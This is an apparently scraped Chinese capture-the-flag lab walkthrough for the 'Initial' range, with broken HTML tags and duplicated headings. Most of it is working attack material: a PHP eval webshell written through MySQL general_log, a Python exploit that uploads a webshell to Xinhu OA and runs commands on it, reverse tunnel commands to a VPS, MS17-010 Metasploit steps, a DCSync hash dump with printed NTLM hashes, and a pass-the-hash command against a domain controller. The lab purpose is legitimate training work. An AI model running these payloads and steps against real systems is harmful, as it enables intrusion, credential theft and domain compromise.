春秋云镜Initial靶场渗透测试教学文档<\/h1>

靶场概述<\/h2>
Initial靶场是一个难度为简单的内网渗透测试环境，包含一个flag分布在不同的机器上。该靶场涵盖了从外网打点到内网渗透的完整流程，涉及多种常见漏洞利用技术。<\/p>

外网打点<\/h2>

信息收集<\/h3>

全端口扫描<\/strong><\/p>

使用Tscan工具进行扫描，发现开放了SSH(22)和HTTP(80)服务<\/li> <\/ul> <\/li>

指纹识别<\/strong><\/p>

识别出目标系统使用ThinkPHP框架<\/li> <\/ul> <\/li> <\/ol>
漏洞利用<\/h3>

ThinkPHP 5.0.23 RCE漏洞<\/strong>

使用集成攻击工具：https:\/\/github.com\/Lotus6\/ThinkphpGUI<\/li>
成功获取webshell，权限为www-data<\/li> <\/ul> <\/li> <\/ol>
权限提升<\/h2>
初始权限检查<\/h3>
id <\/span><\/span># uid=33(www-data) gid=33(www-data) groups=33(www-data)<\/span> <\/span><\/span><\/code><\/pre>SUID提权尝试<\/h3> find \/ -perm -g=<\/span>s -type f 2>\/dev\/null <\/span><\/span># 未发现可利用的SUID文件<\/span> <\/span><\/span><\/code><\/pre>Sudo提权<\/h3> 检查sudo权限：<\/li> <\/ol> sudo -l <\/span><\/span># 发现可以无密码以root权限执行mysql命令<\/span> <\/span><\/span><\/code><\/pre> 利用mysql提权：<\/li> <\/ol> sudo mysql -e '\! cat \/root\/flag\/f*'<\/span> <\/span><\/span><\/code><\/pre>内网渗透<\/h2> 内网信息收集<\/h3> 网络配置检查<\/strong><\/li> <\/ol> ip a <\/span><\/span># 发现内网IP: 172.22.1.15\/16<\/span> <\/span><\/span><\/code><\/pre> 使用fscan扫描内网<\/strong><\/li> <\/ol> chmod 777<\/span> fscan-gw <\/span><\/span>.\/fscan-gw -h 172.22.1.0\/24 <\/span><\/span><\/code><\/pre>扫描结果：<\/p> 172.22.1.15:80 (当前机器)<\/li> 172.22.1.2:445 (域控DC01)<\/li> 172.22.1.21:445 (存在MS17-010漏洞的Win7)<\/li> 172.22.1.18:80 (信呼OA系统)<\/li> <\/ul> 内网隧道搭建<\/h3> 使用iox搭建隧道<\/strong><\/p> VPS端：<\/li> <\/ul> chmod 777<\/span> iox <\/span><\/span>.\/iox proxy -l 4444<\/span> -l 1080<\/span> <\/span><\/span><\/code><\/pre> 目标机：<\/li> <\/ul> chmod 777<\/span> iox <\/span><\/span>.\/iox proxy -r [<\/span>VPS_IP]<\/span>:4444 <\/span><\/span><\/code><\/pre> 攻击机配置：<\/li> <\/ul> echo "socks5 [VPS_IP] 1080"<\/span> >> \/etc\/proxychains4.conf <\/span><\/span><\/code><\/pre><\/li> 使用chisel搭建隧道<\/strong><\/p> VPS端：<\/li> <\/ul> .\/chisel server -p 1234<\/span> --reverse <\/span><\/span><\/code><\/pre> 目标机：<\/li> <\/ul> .\/chisel client [<\/span>VPS_IP]<\/span>:1234 R:0.0.0.0:9383:socks <\/span><\/span><\/code><\/pre> 攻击机配置：<\/li> <\/ul> echo "socks5 [VPS_IP] 9383"<\/span> >> \/etc\/proxychains4.conf <\/span><\/span><\/code><\/pre><\/li> <\/ol> 内网横向移动<\/h2> 1. phpMyAdmin漏洞利用<\/h3> 目录扫描发现phpMyAdmin<\/strong><\/p> 使用Tscan扫描发现phpMyAdmin路径<\/li> <\/ul> <\/li> 爆破获取账号密码<\/strong><\/p> <\/li> 日志写入Webshell<\/strong><\/p> <\/li> <\/ol> show<\/span> variables like<\/span> 'general%'<\/span>; <\/span><\/span>set<\/span> global<\/span> general_log =<\/span> ON<\/span>; <\/span><\/span>set<\/span> global<\/span> general_log_file =<\/span> '\/var\/www\/html\/shell.php'<\/span>; <\/span><\/span>select<\/span> '<?php eval($_POST[cmd]);?>'<\/span>; <\/span><\/span><\/code><\/pre>2. 信呼OA系统利用<\/h3> 弱口令登录<\/strong><\/p> admin\/admin123<\/li> <\/ul> <\/li> RCE漏洞利用<\/strong><\/p> 准备webshell文件1.php：<\/li> <\/ul> <?=<\/span>eval<\/span>($_POST[1<\/span>]);?><\/span> <\/span><\/span><\/span><\/code><\/pre> 使用EXP：<\/li> <\/ul> import<\/span> requests <\/span><\/span>session =<\/span> requests.<\/span>session() <\/span><\/span>url_pre =<\/span> 'http:\/\/172.22.1.18\/'<\/span> <\/span><\/span> <\/span><\/span># 登录<\/span> <\/span><\/span>url1 =<\/span> url_pre +<\/span> '?a=check&m=login&d=&ajaxbool=true&rnd=533953'<\/span> <\/span><\/span>data1 =<\/span> { <\/span><\/span> 'rempass'<\/span>: '0'<\/span>, <\/span><\/span> 'jmpass'<\/span>: 'false'<\/span>, <\/span><\/span> 'device'<\/span>: '1625884034525'<\/span>, <\/span><\/span> 'ltype'<\/span>: '0'<\/span>, <\/span><\/span> 'adminuser'<\/span>: 'YWRtaW4='<\/span>, <\/span><\/span> 'adminpass'<\/span>: 'YWRtaW4xMjM='<\/span>, <\/span><\/span> 'yanzm'<\/span>: ''<\/span> <\/span><\/span>} <\/span><\/span>r =<\/span> session.<\/span>post(url1, data=<\/span>data1) <\/span><\/span> <\/span><\/span># 上传文件<\/span> <\/span><\/span>url2 =<\/span> url_pre +<\/span> '\/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'<\/span> <\/span><\/span>r =<\/span> session.<\/span>post(url2, files=<\/span>{'file'<\/span>: open('1.php'<\/span>, 'r+'<\/span>)}) <\/span><\/span> <\/span><\/span># 触发RCE<\/span> <\/span><\/span>filepath =<\/span> str(r.<\/span>json()['filepath'<\/span>]) <\/span><\/span>filepath =<\/span> "\/"<\/span> +<\/span> filepath.<\/span>split('.uptemp'<\/span>)[0<\/span>] +<\/span> '.php'<\/span> <\/span><\/span>id =<\/span> r.<\/span>json()['id'<\/span>] <\/span><\/span> <\/span><\/span>url3 =<\/span> url_pre +<\/span> f<\/span>'\/task.php?m=qcloudCos|runt&a=run&fileid=<\/span>{<\/span>id}<\/span>'<\/span> <\/span><\/span>r =<\/span> session.<\/span>get(url3) <\/span><\/span> <\/span><\/span># 执行命令<\/span> <\/span><\/span>r =<\/span> session.<\/span>get(url_pre +<\/span> filepath +<\/span> "?1=system('dir');"<\/span>) <\/span><\/span>print(r.<\/span>text) <\/span><\/span><\/code><\/pre><\/li> <\/ol> 3. 永恒之蓝(MS17-010)利用<\/h3> 使用Metasploit<\/strong><\/li> <\/ol> proxychains4 msfconsole <\/span><\/span>use exploit\/windows\/smb\/ms17_010_eternalblue <\/span><\/span>set payload windows\/x64\/meterpreter\/bind_tcp_uuid <\/span><\/span>set RHOSTS 172.22.1.21 <\/span><\/span>exploit <\/span><\/span><\/code><\/pre> 获取系统权限后加载kiwi模块<\/strong><\/li> <\/ol> load kiwi <\/span><\/span>kiwi_cmd "lsadump::dcsync \/domain:xiaorang.lab \/all \/csv"<\/span> <\/span><\/span><\/code><\/pre>获取的哈希示例：<\/p> 502 krbtgt fb812eea13a18b7fcdb8e6d67ddc205b 514 1106 Marcus e07510a4284b3c97c8e7dee970918c5c 512 1107 Charles f6a9881cd5ae709abb4ac9ab87f24617 512 1000 DC01$ 54ed1db3a47a1daf57d32e126e57e322 532 480500 Administrator 10cf89a850fb1cdbe6bb432b859164c8 512 1104 XIAORANG-OA01$ 6453e1d291333aca2bf361933063c99a 4096 1108 XIAORANG-WIN7$ 749114c87a6d02b7961142c18660c8c0 4096 <\/code><\/pre> 4. 域控攻击(DCSync)<\/h3> 使用crackmapexec进行哈希传递<\/strong><\/li> <\/ol> proxychains crackmapexec smb 172.22.1.2 -u administrator -H10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"<\/span> <\/span><\/span><\/code><\/pre>总结<\/h2> 本靶场渗透流程：<\/p> 外网ThinkPHP RCE漏洞利用获取初始立足点<\/li> 通过sudo mysql提权获取root权限<\/li> 内网信息收集发现多个目标<\/li> 搭建隧道实现内网穿透<\/li> 利用phpMyAdmin和信呼OA漏洞横向移动<\/li> 通过永恒之蓝漏洞获取Windows服务器权限<\/li> 使用DCSync攻击获取域控权限<\/li> 最终通过哈希传递获取域控flag<\/li> <\/ol> 关键知识点：<\/p> ThinkPHP RCE漏洞利用<\/li> MySQL sudo提权<\/li> 内网隧道搭建(iox\/chisel)<\/li> phpMyAdmin日志写入Webshell<\/li> 信呼OA RCE漏洞利用<\/li> MS17-010漏洞利用<\/li> DCSync攻击原理与实现<\/li> 哈希传递攻击(PTH)<\/li> <\/ul>

春秋云镜Initial靶场渗透测试教学文档<\/h1>

靶场概述<\/h2> Initial靶场是一个难度为简单的内网渗透测试环境，包含一个flag分布在不同的机器上。该靶场涵盖了从外网打点到内网渗透的完整流程，涉及多种常见漏洞利用技术。<\/p>

外网打点<\/h2>

权限提升<\/h2>

内网渗透<\/h2>

内网横向移动<\/h2>

靶场概述<\/h2>
Initial靶场是一个难度为简单的内网渗透测试环境，包含一个flag分布在不同的机器上。该靶场涵盖了从外网打点到内网渗透的完整流程，涉及多种常见漏洞利用技术。<\/p>